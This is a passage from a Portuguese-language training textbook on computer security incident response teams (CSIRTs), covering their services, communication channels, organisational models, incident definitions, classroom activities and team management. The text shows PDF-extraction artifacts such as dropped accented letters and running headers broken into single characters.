1 Realizar tarefas de auditoria, avaliao de vulnerabilidades e outras avaliaes
que visam identifcar fraquezas nos sistemas ou vulnerabilidades antes que estas
sejam exploradas;
1 Identifcar riscos de novas ameaas e tendncias de maneira a identifcar como elas
podem afetar a instituio;
1 Atualizar assinaturas de antivrus ou IDS de maneira a conter as novas
ameaas identifcadas.
Tabela 1.1
Os diversos
tipos de servios
prestados por
um CSIRT.
8

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Servios de qualidade
q So servios desenvolvidos para aprimorar o processo de resposta a incidentes como
um todo. Para isso, so analisados processos administrativos do CSIRT e tambm a
efetividade dos servios prestados. Dessa forma, podem-se identificar limitaes no
processo e implementar melhorias para o time, seja elas de carter tcnica (treinamento
tcnico para a equipe) ou organizacional (fuxo de informao entre os processos). Essas
tarefas incluem:
1 Gerenciamento da equipe ou processos;
1 Educao ou treinamento;
1 Auditoria de sistemas.
Essas diferentes classifcaes descrevem a natureza dos servios de um CSIRT e fca a
critrio de cada time incorpor-los sua comunidade. Alguns servios so essencialmente
internos; outros; no entanto, podem ser demandados pela comunidade de atuao e
tambm por terceiros. Para isso, deve-se ter claramente documentado as peculiaridades de
cada servio no que tange: escopo, formas de contato e funcionamento.
Por fm, importante que os servios prestados por um CSIRT sejam providos com qualidade
tendo em foco a sua comunidade de atuao. Para isso, torna-se desejvel monitorar a excelncia
dos servios prestados e aprimor-los com lies aprendidas e contribuies dos usurios. Do
contrrio, o CSIRT pode cair em descrdito e a sua comunidade pode parar de reportar incidentes.
Interao com os servios
q Alm de especifcar os servios providos por um CSIRT, essencial descrever como estes
podem ser instanciados. Desse modo, um CSIRT deve estabelecer diferentes canais de
comunicao para a sua comunidade, permitindo que os servios disponveis sejam
solicitados. Existem diferentes meios de contato.
Talvez o mais utilizado o sistema de e-mail. No entanto, devem-se prever outras formas de
interao com a equipe, incluindo at mesmo requisies pessoais originadas por funcion-
rios da prpria empresa in loco.
q Quando defnir os canais de comunicao, o CSIRT deve considerar questes relativas
documentao das solicitaes. Por exemplo:
1 Como gerenciar um incidente notifcado via telefone?
1 Como atualizar a equipe referente ao status de um incidente notifcado pessoalmente?
1 Incidentes no documentados faro parte das estatsticas de um CSIRT?
Sabe-se que um CSIRT pode se comunicar com a sua comunidade de diferentes formas.
Na sequncia, so descritos os principais canais de comunicao.
9

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
q Formas de disseminar informaes e requisitar servios:
1 Telefone: uma das formas mais simples e diretas de comunicao com a sua comu-
nidade de atuao via contato telefnico. A conversao telefnica uma forma
direta de reportar incidentes e lidar com informaes que possuem carcter de
urgncia. No entanto, ligaes telefnicas podem gerar interpretaes errneas,
sobretudo em situaes de emergncia. Outro ponto negativo do uso do telefone
a interrupo causada pelas ligaes. Em eventos de segurana, comum que
muitas pessoas entrem em contato com o CSIRT, o que pode atrasar a resoluo de
um incidente em andamento. Alguns times optam por no realizar atendimento via
telefone, mas disponibilizam um telefone de urgncia tal como um celular para
efetivamente receber ligaes telefnicas de um grupo mais restrito (gerncia e
equipe tcnica);
1 INOC-DBA: O INOC-DBA (Hotline Phone System) uma infraestrutura VoIP para comu-
nicao direta entre Centros de Operao de Redes (NOCs) e Grupos de Tratamento
de Incidentes de Segurana (CSIRTs). Deseja-se, com isso, que todos os provedores
e grandes redes conectadas na internet sejam facilmente contatados por quaisquer
outros provedores do mundo. Para isso, cada participante do INOC-DBA possui um
ramal que corresponde ao nmero do prprio AS (Sistema Autnomo, na sigla em
ingls) e pode receber e solicitar ligaes de forma gratuita. No Brasil, o Comit
Gestor da Internet no Brasil participa do projeto fornecendo gratuitamente telefones
VoIP para todos os ASs e CSIRTs reconhecidos. Mais informaes: http://www.ceptro.
br/CEPTRO/MenuCEPTROSPInocDba;
1 E-mail: a maneira mais utilizada para comunicao entre o CSIRT e a comunidade
de atuao , sem dvida, o e-mail. Sabemos das vantagens da comunicao via
e-mail: rapidez, comodidade e fcil identifcao do remetente. No contexto do CSIRT,
a comunicao via e-mail essencial. Logo, faz-se necessrio que o CSIRT envie
e, principalmente, receba todos os e-mails destinados ao time. Recomenda-se que
nenhum tipo de fltro seja utilizado na caixa de entrada do e-mail, tal como antispam
e antivrus (fltro de anexos). Afnal, a comunidade pode encaminhar um spam para a
equipe analisar, e at mesmo repassar arquivos maliciosos executveis. De forma com-
plementar, recomenda-se a utilizao de e-mails impessoais, ou seja, importante a
instituio ter um e-mail de contato, como por exemplo csirt@instituicao. De forma
resumida, as boas prticas recomendam:
2 Utilizar e-mail impessoal;
2 No usar fltragem na caixa de e-mail (antispam);
2 Cuidado com cotas e limites de e-mails recebidos ou enviados;
2 Divulgar o e-mail institucional no website;
2 Manter o sistema de WHOIS apontado para um e-mail vlido;
2 Direcionar os mltiplos e-mails (alias) do CSIRT para uma caixa postal nica.
10

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Boletins: alguns CSIRTs costumam repassar informaes de segurana para a sua
comunidade por meio de listas de e-mails ou mesmo via boletins impressos.
A divulgao de informaes que afetam especialmente a comunidade de abran-
gncia como, por exemplo, atualizao de sistemas utilizados e dicas de segurana
incluindo confgurao segura uma maneira efetiva de evitar incidentes de segurana;
1 Website: uma maneira efcaz de divulgar informaes para a comunidade de abran-
gncia. Alm de disseminar uma variedade de informaes como boletins e notcias,
um site serve para disponibilizar procedimentos e formas de contato do CSIRT. Alguns
times tambm disponibilizam ferramentas e outros softwares teis para a comunidade.
Embora seja praticamente mandatrio todo CSIRT ter um website, importante zelar por
sua segurana. Afnal, um defacement no site de um CSIRT pode causar prejuzos
imagem do time;
1 Conferncias: participar de conferncias ou mesmo promover conferncias e semi-
nrios mais uma forma de comunicar-se com a comunidade de atuao. A apresen-
tao de trabalhos em conferncias tambm importante. Ter membros da equipe
apresentando trabalhos em eventos pode aumentar a reputao do time e ajudar no
processo de divulgao de informaes para a comunidade;
1 Cursos: a realizao de cursos para a comunidade com foco em segurana uma
prtica adotada por alguns times. A realizao de cursos na prpria instituio tambm
serve para intensifcar e disseminar a prpria poltica de segurana da instituio.
importante lembrar que a comunicao entre um CSIRT e as demais partes envolvidas tipi-
camente envolvem informaes sigilosas. Questes relativas segurana das informaes
trfego de dados e armazenamento das informaes devem ser consideradas pela equipe
no momento em que um novo canal de comunicao instaurado.
Aspectos operacionais de um CSIRT
q Os aspectos operacionais de um CSIRT defnem especifcamente qual ser a forma de
atuao da equipe tanto no mbito operacional quanto no organizacional.
As particularidades de cada CSIRT tm infuncia direta na estrutura e operao da equipe.
Por exemplo, aspectos como a comunidade atendida, natureza das informaes e modelo
gerencial da equipe defniro a forma como os incidentes sero tratados internamente.
Na sequncia, so discutidos os principais aspectos operacionais, considerando as particu-
laridades dos CSIRTs, incluindo abrangncia operacional, modelos estruturais e autonomia
da equipe:
q 1 Tipos;
1 Modelos;
1 Autonomia.
Tipos
q Um CSIRT pode ser classifcado segundo a sua rea de atuao. A abrangncia de atuao
dos CSIRTs est intimamente ligada ao setor de atuao. Principais categorias de CSIRTs:
1 CSIRTs internos: so os CSIRTs que cuidam somente dos incidentes da sua instituio
e, em alguns casos, no so publicamente divulgados. Exemplo: instituies fnanceiras;
Defacement:
Ataque que tem como
objetivo alterar sem
autorizao o contedo
de uma pgina web.
11

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
q 1 CSIRTs de coordenao: so times que atuam como intermediadores. Atuam repas-
sando informaes e medindo tendncias. Tais CSIRTs, tipicamente, no possuem
nenhum poder sobre os grupos com os quais interagem. Exemplo: CSIRT nacional;
1 CSIRTs de vendedores: so os CSIRTs que representam os fabricantes de hardware
ou software e que tratam das vulnerabilidades existentes nos seus produtos;
1 CSIRTs de consultoria: prestam os servios relacionados com a resposta de inci-
dentes de forma terceirada. Esse tipo de CSIRT utilizado por empresas que no
possuem o seu prprio CSIRT;
1 CSIRTs de pesquisa: so grupos especializados em pesquisa na rea de segurana,
tipicamente relacionado com estudo de vulnerabilidades.
Modelos
q Apesar de atuarem na mesma rea, os CSIRTs podem possuir modelos estruturais dife-
rentes. Principais estruturas organizacionais utilizadas na implantao dos CSIRTs:
1 CSIRTs centralizados: a equipe possui membros dedicados s atividades do CSIRT,
sendo estabelecida de forma centralizada no mbito da organizao;
1 CSIRTs descentralizados: a equipe fca geografcamente distribuda em diferentes
cidades ou, at mesmo, pases. Possui equipe dedicada s atividades de tratamento
e resposta aos incidentes de rede computacionais, podendo atuar operacionalmente
de forma independente, porm alinhada com as diretrizes estabelecidas pela coorde-
nao central;
1 CSIRTs mistos: trata-se da juno entre modelos centralizados e descentralizados.
Nessa estrutura, a equipe centralizada responsvel por criar as estratgias, geren-
ciar as atividades e distribuir as tarefas entre as equipes descentralizadas;
1 CSIRTs de crise: a equipe reunida durante a emergncia de um processo de crise,
sendo composta por especialistas de cada rea, deixando de existir aps a concluso
de soluo do incidente.
Um desafo crescente para os CSIRTs est em acompanhar o que acontece na rea de
segurana durante as 24h do dia. Um CSIRT descentralizado ou misto possui a vantagem
de possuir representantes em diversos fusos horrios, permitindo, assim, cobertura
mais ampla dos acontecimentos.
Autonomia
q Outro fator crtico como aspecto fundamental de organizao a autonomia do CSIRT.
A autonomia descreve o nvel de responsabilidade e tambm o escopo de atuao da
equipe sobre atividades relacionadas ao tratamento de incidentes. A classifcao dos
diferentes nveis de autonomia apresentada a seguir:
1 Autonomia Completa: uma equipe tem autonomia plena para tomar as decises
e executar as medidas necessrias para solucionar um incidente de segurana.
As decises podem ser tomadas pela equipe sem a necessidade de aprovao de
nveis superiores de gesto;
1 Autonomia Compartilhada: uma equipe com autonomia compartilhada deve atuar
em conjunto com os outros setores da organizao. Para isso, a equipe participa do
processo de tomada de deciso sobre as aes a serem implementadas com outros
membros da organizao;
12

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Sem Autonomia: a equipe sem autonomia s pode agir com autorizao expressa
de um responsvel previamente designado. Nessa categoria a equipe apenas pode
recomendar os procedimentos a serem executados; no entanto, no tem participao
no processo fnal de deciso.
Definio de incidente
q Um incidente de segurana pode ser defnido como qualquer evento adverso, confrmado
ou sob suspeita, que pode comprometer em algum aspecto a segurana computacional.
Em geral, toda situao na qual um ativo de informao est sob risco considerado um
incidente de segurana.
A defnio de um incidente de segurana fundamental para as operaes de um CSIRT.
Apesar de muitas vezes ser abstrata, a defnio deve ter relao com as atividades e rea
de atuao do prprio CSIRT. Deve-se, por exemplo, determinar que tipos de eventos sero
tratados pela equipe.
q Exemplos comuns de incidentes incluem:
1 A desfgurao do portal web de uma instituio;
1 O vazamento de informaes confdenciais;
1 A propagao de um vrus por meio da lista de contatos de e-mails;
1 O envio de spam;
1 O comprometimento da rede;
1 A inacessibilidade de um website.
Na sequncia so listadas algumas defnies de incidentes de segurana descritos por
diferentes times e especifcaes de segurana:
q 1 CAIS/RNP (http://rnp.br/cais/):
Um incidente de segurana resultante do mau uso dos recursos computacionais.;
1 CERT/CC (http://www.cert.org/tech_tips/incident_reporting.html):
Um ato de violao explcita ou implcita de uma poltica de segurana.;
1 Terena (www.terena.nl/activities/tf-csirt/iodef/docs/i-taxonomy_terms.html):
Um incidente de segurana um evento que envolve uma violao de segurana.;
1 NIST (disponvel em SP 800-3: Establishing a Computer Security Incident Response
Capability): Qualquer evento adverso em que aspectos da segurana computacional
podem ser ameaados;
1 RFC 2350 (http://www.ietf.org/rfc/rfc2350.txt): Qualquer evento adverso que pode
comprometer algum aspecto da segurana de computadores ou da rede.;
1 DSIC (http://dsic.planalto.gov.br/legislacaodsic/53): Qualquer evento adverso, confr-
mado ou sob suspeita, relacionado segurana dos sistemas de computao ou das
redes de computadores.
Incidentes de segurana podem facilmente resultar em impacto signifcativo para uma insti-
tuio se no manejados de forma correta. De fato, a severidade de um incidente mensurada
segundo o impacto que causa no processo de negcio de uma instituio. Por exemplo, um
incidente que indisponibiliza um site de e-commerce possui alta severidade para a instituio.
13

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
q Todo incidente deve ser tratado seguindo uma metodologia previamente defnida pelo
CSIRT. Essa metodologia chamada de processo de resposta a incidente e ser poste-
riormente tratada em nosso curso.
Passos para criao de um CSIRT
Conforme descrito anteriormente, existem diferentes fatores que devem ser observados
para a criao de um CSIRT. Alm de questes polticas, como aprovao organizacional,
importante o CSIRT ser reconhecido como atuante na prpria comunidade.
q No que tange a questes organizacionais, importante considerar as seguintes questes
durante o processo de formao de um CSIRT:
1 Abrangncia operacional;
1 Misso;
1 Servios;
1 Modelo organizacional;
1 Recursos.
De forma resumida, temos nas etapas iniciais a defnio do escopo de atuao, bem como
as metas e objetivos do CSIRT. A identifcao da comunidade a ser atendida fundamental,
pois possibilita mapear as necessidades e servios necessrios para atend-la. J o modelo
organizacional incluindo o tipo e estrutura determinam a estratgia administrativa a ser
implementada aos servios. Por fm, e no menos importante: j na fase de estabelecimento
de um novo CSIRT deve-se assegurar os recursos necessrios para manter o time operacional,
observando recursos da infraestrutura (equipamentos) e pessoal (equipe). Do contrrio, as
etapas anteriores no sero efetivas.
Fruns de CSIRTS
Assim como algumas categorias de instituies, os CERTs tambm se organizam em fruns
e entidades que buscam a colaborao entre os times. As principais entidades que podem
servir de ponto de contato para localizar times so:
q 1 FIRST: Forum of Incident Response Security Teams
http://www.frst.org
1 APCERT: Asian Pacifc Computer Emergency Response Teams
http://www.apcert.org
1 CSIRTs: European Trusted Introducer CSIRTs Members
http://www.ti.terena.nl
1 OIC: Organization of the Islamic Conference
http://www.oic-oci.org/
O Forum of Incident Response Security Teams (FIRST) uma das organizaes mais antigas.
O FIRST uma organizao profissional, sem fins lucrativos, composta por diferentes CSIRTs.
Os times de segurana que a compem so muito heterogneos: de times nacionais (CERTs),
CSIRTs de vendedores, CSIRTs internos a CSIRTs comerciais. O FIRST promove eventos anuais
para membros onde possvel estabelecer contatos com outros times e tambm capacitar a
equipe nos diversos seminrios e cursos disponibilizados. importante notar que o FIRST uma
associao de CSIRTs, mas no atua como um CSIRT. Ou seja, o FIRST no responde a incidentes
de segurana, mas pode ser til para identifcar os responsveis por recursos de internet.
14

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Leitura recomendada:
1 Creating an Incident Response Team:
http://www.educause.edu/ir/library/pdf/SEC0302.pdf
1 NIST SP 800-3: Establishing a Computer Security Incident Response Capability (CSIRC):
http://www.terena.nl/activities/tf-csirt/archive/800-3.pdf
1 RFC 2.350: Expectations for Computer Security Incident Response:
http://www.ietf.org/rfc/rfc2350.txt
1 Forming an Incident Response Team:
http://www.auscert.org.au/render.html?it=2252
1 Departamento de Segurana da Informao e Comunicaes (DSIC): Criao de equipes
de tratamento e resposta a incidentes em redes computacionais ETIR. Disponvel em:
http://dsic.planalto.gov.br/legislacaodsic/53
15

C
a
p

t
u
l
o


1

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

1
Roteiro de Atividades 1
Atividade 1.1 Criao de um CSIRT
Para essa atividade, sero criados grupos. O nmero de pessoas por grupo fcar a critrio do
instrutor. No entanto, recomenda-se misturar pessoas que sejam provenientes da mesma
instituio. O instrutor vai alocar cada grupo em uma das diferentes categorias:
1 CSIRT do Governo Federal;
1 CSIRT bancrio;
1 CSIRT de uma universidade;
1 CSIRT nacional;
1 CSIRT de uma empresa de telecomunicaes.
As atividades a seguir conduziro os alunos no processo de criao de um CSIRT, tendo em
vista os conceitos apresentados neste captulo.
Atividade 1.2 Nome e sigla
a. Defna um nome e uma sigla para o seu grupo.
Atividade 1.3 Abrangncia operacional
a. Defna a abrangncia operacional, ou seja, a comunidade a qual o seu grupo prover servios.
Atividade 1.4 Misso
a. Defna a misso do seu grupo.
Atividade 1.5 Estrutura organizacional
a. Defna a estrutura organizao do seu grupo incluindo tipo, modelo e escopo de atuao.
16

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 1.6 Servios
a. Com a lista de servios do CERT/CC, cada grupo deve escolher cinco servios que sero
oferecidos pelo CSIRT. Leve em conta a misso e abrangncia operacional: http://www.
cert.org/csirts/services.html
1. Processo de tratamento de incidente
2.
3.
4.
5.
Quantos profssionais so necessrios para cada atividade?
1. Processo de tratamento de incidente:
2.
3.
4.
5.
b. Dos servios oferecidos, escolha quais poderiam ser utilizados para gerar recursos para o
CSIRT. Quais adaptaes seriam necessrias no seu time para que isso seja possvel?
c. Para a lista de servios oferecidos pelo seu CSIRT, defna: qual ser o horrio de aten-
dimento, a forma de contato e qual pessoa da equipe est capacitada para lidar com a
requisio?
Considere as seguintes questes:
1. O CSIRT atende a casos de emergncia? Quais so esses casos?
2. O CSIRT lida com informaes confdenciais?
3. O CSIRT lida com informaes protegidas por segredo de justia ou que esto em fase
de investigao?
17

C
a
p

t
u
l
o


1

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

1
4. O CSIRT recebe denncias de pornografa infantil?
d. Como seu CSIRT abordaria a seguinte situao?
1. O sistema de e-mail do CSIRT est inoperante. Como alternativa, um colega notifca um
incidente crtico vazamento de informaes via telefone. Foi deixada uma mensagem
na secretria de voz do CSIRT na data de 25 de dezembro, 2h28. Como esse incidente
seria tratado pela equipe?
2. Quanto tempo o incidente demorou a ser tratado?
Quem pode acessar as mensagens do telefone?
Atividade 1.7 Incidente de segurana
a. Defna o que ser considerado um incidente de segurana para o seu grupo.
Considere que as aes futuras do seu CSIRT dependero disso.
b. Responda se a sua defnio de incidente abordaria a seguinte situao como sendo
um incidente:
Nesta ltima sexta-feira, com o incio do processo de inscrio do vestibular via formulrio
eletrnico, um funcionrio terceirizado da empresa de manuteno de jardins cortou o
cabo de energia do Centro de Computao, resultando na indisponibilidade do servio de
inscrio at o conserto da pea, o que ocorreu somente na segunda-feira seguinte, pois a
pea estava em falta no mercado.
1. Isso constitui um incidente de segurana?
2. Esse incidente estava previsto na elaborao de sua defnio?
18

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
3. A partir desse exemplo, quais ajustes voc faria na sua defnio?
c. De forma complementar, a sua defnio de incidente abordaria as seguintes situaes
como sendo um incidente ou se seria necessria alguma nova alterao?
1. Uma ligao telefnica para o diretor de departamento solicitando a senha de um ser-
vidor crtico, pois o funcionrio responsvel est inacessvel.
2. Uma notifcao em nome da companhia de eletricidade, informando uma manuteno
tcnica programada, a ser executada no fnal de semana, com uma janela de 8h.
3. Um e-mail com ameaa de exploso de bomba no prdio que abriga a infraestrutura de
rede da empresa.
4. A publicao do arquivo de senhas do servidor de e-mail no jornal interno de
uma universidade.
5. O envio de fotos pornogrfcas para a lista interna de contatos da empresa.
19

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
2
Gerenciamento do CSIRT
Discutir questes relacionadas aos requisitos estruturais de um CSIRT; Conhecer os
fatores de sucesso na criao de um CSIRT; Aprender os conceitos relacionados ao
gerenciamento de um CSIRT.

Gerenciamento de CSIRTs; Viso estrutural do CSIRT; Melhores prticas e condutas
apropriadas.


Introduo
q O gerenciamento de um CSIRT, assim como outras organizaes, envolvem etapas tc-
nicas e administrativas. Todas essas etapas possuem um nico objetivo: assegurar que o
CSIRT cumpra a prpria misso, previamente defnida.
De forma mais especfca, busca-se assegurar que os servios relacionados resposta a inci-
dentes de segurana sejam efetivamente prestados para a sua comunidade de abrangncia.
Neste contexto, este captulo discutir tpicos relacionados ao gerenciamento de um CSIRT,
tal como: gerenciamento da equipe, comunicao, requisitos estruturais e fatores de sucesso.
Cdigo de conduta
q O cdigo de conduta defne um conjunto de premissas que balizam as aes e comporta-
mentos de um time de segurana.
O mesmo cdigo aplica-se a todos os membros da organizao, estendendo-se aos servios
prestados e aos demais aspectos operacionais, tais como a comunicao e o zelo pelas
informaes.
q De forma especfca, o cdigo de conduta vincula princpios e valores da prpria insti-
tuio com atividades desempenhadas pela equipe.
Princpios como profssionalismo, confabilidade e liderana infuenciam na forma com que o
CSIRT visto externamente.
Um bom cdigo de conduta descreve princpios para a interao com os usurios dos
servios do CSIRT e tambm a maneira com que as informaes so tratadas internamente
pela equipe. Sem o devido cuidado para lidar com as informaes sensveis, provvel que
as entidades parceiras possam hesitar em divulgar dados para o seu time em futuros inci-
dentes de segurana.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
20

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
A conduta profssional com que as informaes so tratadas por um CSIRT evidentemente
particular a cada instituio. Sabe-se que existem alguns CSIRTs que optam por regras mais
restritivas. Um CSIRT militar, por exemplo, implementa alto nvel de sigilo com as informa-
es que gerencia. Por outro lado, um CSIRT acadmico pode implementar um cdigo de
conduta mais fexibilizado no que tange ao armazenamento de informaes de segurana.
Observa-se, entretanto, que a grande maiorias dos CSIRTs possuem polticas e procedi-
mentos que classifcam as informaes ao menos em duas categorias: dados pblicos e
dados sigilosos. J em uma soluo mais robusta, podem-se classifcar as informaes em
uma estrutura multinvel.
q A seguir temos o exemplo de uma estrutura de classifcao de informaes de segurana.
1 Classifcado: so informaes sigilosas, onde apenas o CSIRT tem conhecimento do
incidente. Da mesma forma, a circulao das informaes restrita aos membros do
time de segurana. Esse tipo de classifcao utilizado em eventos de segurana
especiais ou ainda em incidentes com escopo bem defnido;
1 Parcialmente classifcado: so dados que possuem certo nvel de restrio. Tais
informaes so intercambiadas apenas com entidades com alto nvel e confiana, tal
como CSIRTs com bom relacionamento;
1 No classifcados: so informaes que podem ser divulgadas na forma pblica.
Para isso, deve-se avaliar o teor das informaes a serem classifcadas como No
classifcado, a fm de evitar prejuzos s partes envolvidas. Na maioria das vezes,
dados inseridos nessa categoria possuem carter informacional, como, por exemplo,
divulgao de documentao ou estatsticas pblicas do CSIRT.
Cada nvel de classifcao tambm especifca como as informaes devem ser gerenciadas
sob o ponto de vista operacional. Em nveis mais restritivos, por exemplo, todas as informa-
es devem ser cifradas, tanto na comunicao quanto no armazenamento.
Independentemente do modelo de classifcao de informaes adotado, fundamental
que o CSIRT mantenha-se consistente e estenda a classifcao para os demais servios e
elementos relacionados ao processo de resposta a incidentes.
Um exemplo consiste na gesto das informaes de contatos tcnicos. Por ser um ponto de
contato para incidentes de segurana, espera-se que um CSIRT tenha um bom relaciona-
mento com entidades externas. Na maioria das vezes, a equipe do CSIRT conhece pessoas
de outros times que podem auxiliar em uma eventual emergncia. Esses contatos, que no
so pblicos, e sim fruto de uma boa relao com outras equipes, devem ser tratados de
forma adequada segundo a conduta o seu prprio CSRIT.
q Considere a seguinte situao:
O seu CSIRT recebe uma ligao de um colaborador externo (entidade A), em carter de
urgncia, solicitando os contatos mais especfcos de uma instituio (entidade B), pois
est sofrendo ataques.
O cdigo de conduta de sua instituio deve prever possveis aes que contemplem esse
exemplo. Nesse caso, deve-se analisar se o cdigo de conduta permite encaminhar os seus
contatos mais especfcos a entidades externas.
q Possveis solues:
1 O CSIRT no encaminha os dados (da entidade B), pois faz parte do seu cdigo de
conduta manter contatos mais especfcos de forma confdencial;
21

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
q 1 O CSIRT encaminha contatos mais especfcos para o colaborador externo (entidade A);
1 O CSIRT atua como intermedirio, repassando a informao do ataque diretamente
para a entidade B.
A divulgao de informaes tambm faz parte do cdigo de conduta do CSIRT. Os meios
para divulgar informaes sero tratados posteriormente por este curso; no entanto,
cabe ao cdigo de conduta defnir uma poltica para a divulgao de informaes. Essa
poltica deve descrever o conjunto de informaes que podem ser divulgadas no contexto
de resposta a incidentes. Sem a defnio dessa poltica, a equipe pode no ter orientao
necessria para gerenciar o processo de resposta a incidentes.
Alguns times tratam todas as informaes como estritamente confdencial, evitando o
compartilhamento das informaes fora do mbito dos membros da equipe. No entanto,
essa poltica estrita no pode ser garantida em todos os casos. Por exemplo, em casos onde
necessria a interao da Justia.
q Logo, desejvel que, independentemente da poltica utilizada, sejam consideradas
algumas questes, como:
1 Que time de informao o CSIRT divulgar quando outro CSIRT notifcar um incidente
envolvendo a comunidade de sua responsabilidade?
1 Quando necessria interao com a Justia, o seu CSIRT poder prover informaes
necessrias de forma direta?
1 Que tipo de informaes sero divulgadas de forma pblica?
1 Todo incidente ser notifcado a um CSIRT de coordenao, como por exemplo, CERT.br?
1 As informaes de incidentes externos sero ocultadas, como por exemplo, saniti-
zao de IPs de sua rede?
Todas essas decises fazem parte do cdigo de conduta de um CSIRT e devem ser consi-
deradas nas etapas iniciais do estabelecimento de um CSIRT na comunidade. importante
notar que essa poltica de conduta algo que pode ser alterado. Em muitos times, comum
que novas questes sejam contempladas e aprimoramentos sejam incorporados com a
aquisio de experincia.
Equipe
Constituir uma equipe uma das primeiras coisas a serem pensadas na etapa de estabe-
lecimento de um CSIRT. De fato, a equipe tem papel fundamental nas atividades do CSIRT,
dando suporte s polticas internas, procedimentos e cdigo de conduta intrnseco ope-
rao de um time.
q Sabe-se que a defnio de uma equipe passa por diversos aspectos, incluindo questes
tcnicas, gerenciais e, essencialmente, a alocao de recursos fnanceiros.
Do contrrio, a equipe no poder prover de forma adequada os servios para a comunidade
e contemplar a misso do prprio CSIRT.
q Alguns fatores tambm devem ser considerados no momento da defnio de uma equipe:
1 Nmero de pessoas necessrias;
1 Habilidades necessrias;
1 Habilidades desejadas;
1 Nveis hierrquicos;
22

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Carga horria;
1 Rotatividade;
1 tica.
Estimar o nmero de pessoas necessrias para uma equipe, sobretudo em etapas iniciais
de operao, uma tarefa complexa. O tamanho da equipe deve considerar um nmero
ideal de profssionais necessrios para realizar as atividades de um CSIRT, incluindo equipe
tcnica e gerencial.
q O tamanho da equipe deve considerar aspectos como:
1 Recursos fnanceiros;
1 Recursos humanos;
1 Servios prestados;
1 Comunidade a ser atendida.
Sabe-se, no entanto, que uma vez que o time de segurana estiver estabelecido, novos
servios so demandados pela comunidade. Alm disso, o conjunto de servios oferecidos
deve ser aprimorado, o que pode demandar mais trabalho que o inicialmente previsto.
Portanto, defnir o tamanho da equipe tem infuncia direta na qualidade das atividades
prestadas pelo CSIRT.
Nos primeiros anos, muitos CSIRTs atuam com uma equipe minimizada e, com o passar
do tempo, novos membros ingressam no time, aprimorando os servios prestados. A fm
de adequar o tamanho da equipe ao volume de trabalho demandado, recomenda-se fazer
uma estimativa com base nas notifcaes recebidas por outros times e tambm no nmero
de usurios conectados na rede, ou seja, a base de usurios que a equipe atender. Esse
nmero necessrio de pessoas na equipe deve considerar tambm o crescimento de notif-
caes que pode chegar a 100% ao ano e tambm possveis expanses de uma empresa.
No existe relao direta entre nmero de pessoas atendidas versus nmero de pessoas
na equipe. Isso pode variar muito, afnal, est relacionado com a misso do CSIRT, onde
descrita a comunidade atendida e o conjunto de servios realizados.
A equipe deve ser composta por profssionais com diferentes tipos de habilidades. Alm de
habilidades tcnicas necessrias para a execuo das tarefas de um CSIRT, importante que
os integrantes da equipe tenham habilidades administrativas e gerenciais.
q Uma equipe multifacetada inclui profssionais com expertises em diferentes reas:
1 Especialistas em tecnologia de segurana;
1 Administradores de sistemas;
1 Engenheiros de redes;
1 Especialistas em suporte;
1 Gerente;
1 Conselho legal.
Evidentemente, as habilidades necessrias precisam estar alinhadas com os servios ofe-
recidos. As habilidades tcnicas desejadas na operao de um CSIRT requerem o entendi-
mento da tecnologia utilizada, tal como hardware e software.
23

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
q Mesmo assim, existem alguns conhecimentos que so essenciais para a equipe que lida
com incidentes de segurana:
1 Protocolos de redes (HTTP, MTA, DNS e FTP);
1 Sistemas Operacionais;
1 Infraestrutura de redes (roteadores e comutadores);
1 Ferramentas de segurana (IDS e frewall);
1 Criptografa;
1 Aplicaes de rede;
1 Princpios bsicos de segurana;
1 Programao.
De fato, as habilidades tcnicas fazem parte dos atributos necessrios para os integrantes
de uma equipe. Porm, nem todos os membros do time necessitam ter alto nvel de conheci-
mento em todas as reas tcnicas.
fundamental, entretanto, que a equipe consiga lidar com os incidentes reportados pela
sua comunidade. Na prtica, os outros departamentos da instituio s recorrero ao CSIRT
uma vez que reconheam as competncias tcnicas do time para auxiliar de forma correta
nas necessidades identifcadas.
Alm das habilidades tcnicas, as habilidades interpessoais so igualmente importantes.
Em alguns casos, mais fcil aprimorar as habilidades tcnicas dos integrantes de uma
equipe do que trabalhar as habilidades interpessoais.
As habilidades interpessoais so exigidas nas mais diferentes etapas dos servios prestados
por um CSIRT e no devem ser menosprezadas. A equipe est constantemente interagindo
com times de segurana e com os demais departamentos da instituio. Sabe-se da impor-
tncia da interao com a comunidade de atuao do CSIRT, afnal, a reputao do CSIRT
depende do profssionalismo empreendido pela equipe.
q A seguir, algumas caractersticas interpessoais desejadas:
1 Comunicao verbal: comunicar de maneira clara e diplomtica, e tambm saber ouvir;
1 Comunicao no verbal: leitura, escrita e linguagem corporal (para palestras e eventos);
